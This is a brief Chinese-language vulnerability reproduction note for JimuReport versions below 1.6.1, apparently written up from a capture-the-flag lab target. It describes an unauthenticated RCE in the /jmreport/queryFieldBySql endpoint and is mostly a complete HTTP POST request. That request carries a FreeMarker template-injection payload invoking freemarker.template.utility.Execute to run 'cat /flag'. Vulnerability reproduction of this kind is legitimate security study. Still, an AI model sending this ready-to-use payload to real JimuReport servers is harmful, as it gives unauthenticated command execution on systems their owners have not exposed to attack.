一、漏洞概述
jeect-boot积木报表由于未授权的 API /jmreport/queryFieldBySql 使用了 freemarker 解析 SQL 语句从而导致了 RCE 漏洞的产生。
二、影响范围
JimuReport < 1.6.1
三、访问页面
四、漏洞复现
1、RCE任意命令执行
POST /jmreport/queryFieldBySql HTTP/1.1
Host: eci-2zef9zev2i5w70m49lrz.cloudeci1.ichunqiu.com:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
X-Access-Token: null
token: null
JmReport-Tenant-Id: null
Content-Type: application/json
Connection: close
Referer: http://eci-2zef9zev2i5w70m49lrz.cloudeci1.ichunqiu.com:8080/
Cookie: Hm_lvt_5819d05c0869771ff6e6a81cdec5b2e8=1721718600; Hm_lpvt_5819d05c0869771ff6e6a81cdec5b2e8=1721718600; HMACCOUNT=1C1A15AC9C5F3623
Content-Length: 103
{"sql":"select '<#assign ex=\"freemarker.template.utility.Execute\"?new()> ${ ex(\" cat /flag \") }' "}